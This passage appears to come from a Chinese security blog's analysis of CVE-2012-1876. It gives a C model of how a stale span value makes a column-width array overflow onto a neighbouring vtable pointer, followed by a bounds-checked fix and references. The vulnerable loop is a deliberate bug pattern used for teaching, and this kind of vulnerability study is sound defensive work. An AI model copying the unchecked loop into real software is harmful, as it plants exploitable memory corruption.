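As an added illustration, not code from this post or from mshtml, the following C model shows the root cause behind the dumps above: the width array was allocated for the original span (6) while the layout loop iterates over the updated span (666), so the writes run past the array into the neighbouring object and land on its vtable pointer; the hardened variant checks the span against the allocated capacity before writing. INITIAL_SPAN, the 16-byte neighbour layout and the vtable placeholder 0x11111111 are constructed values.

```c
#include <stdint.h>
#include <string.h>

/* Simplified model, added for illustration (not mshtml's code), of the
 * CVE-2012-1876 pattern: the column-width array is sized from the <col>
 * span present at creation, but the layout pass loops over the current
 * span. A constructed "heap" puts an object whose first field is a vtable
 * pointer directly after the array, as the dump above shows. */
#define INITIAL_SPAN 6
#define SLOT         sizeof(uint32_t)
#define ARRAY_BYTES  (INITIAL_SPAN * SLOT)
#define HEAP_BYTES   (ARRAY_BYTES + 16)   /* array + one neighbour object */
#define VTABLE_OK    0x11111111u          /* placeholder vtable address */

typedef struct { uint8_t bytes[HEAP_BYTES]; size_t capacity; } model_heap;
static void heap_init(model_heap *h) {
    uint32_t vt = VTABLE_OK;
    memset(h->bytes, 0, sizeof h->bytes);
    h->capacity = INITIAL_SPAN;
    memcpy(h->bytes + ARRAY_BYTES, &vt, sizeof vt);   /* neighbour's vtable */
}
static uint32_t neighbour_vtable(const model_heap *h) {
    uint32_t vt;
    memcpy(&vt, h->bytes + ARRAY_BYTES, sizeof vt);
    return vt;
}
static model_heap g_heap;
static model_heap *fresh_heap(void) { heap_init(&g_heap); return &g_heap; }

/* Vulnerable: loop bound is the attribute value, not the allocation size.
 * Writes stop at the model heap's end only so the demo stays defined. */
static void fill_widths_vulnerable(model_heap *h, int span, uint32_t width) {
    for (int i = 0; i < span && (size_t)(i + 1) * SLOT <= HEAP_BYTES; i++)
        memcpy(h->bytes + i * SLOT, &width, sizeof width);
}

/* Hardened: the loop bound is checked against the allocated capacity. */
static int fill_widths_checked(model_heap *h, int span, uint32_t width) {
    if (span < 0 || (size_t)span > h->capacity)
        return -1;                        /* must reallocate before writing */
    for (int i = 0; i < span; i++)
        memcpy(h->bytes + i * SLOT, &width, sizeof width);
    return 0;
}

/* Neighbour's vtable field after the vulnerable loop runs with span 666. */
static uint32_t vtable_after_vulnerable(void) {
    fill_widths_vulnerable(fresh_heap(), 666, 0x41414141u);
    return neighbour_vtable(&g_heap);     /* 0x41414141: pointer clobbered */
}
```

The clobbered value 0x41414141 is what a crash like the one above reflects in the register that carried the vtable pointer; the checked variant leaves the neighbour untouched and returns -1 so the caller can resize first.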

This concludes the analysis of this vulnerability.

References

《漏洞战争》 (Vulnerability Wars)

WinDbg vulnerability analysis and debugging (part 1): https://paper.seebug.org/179/


©2019 CSDN
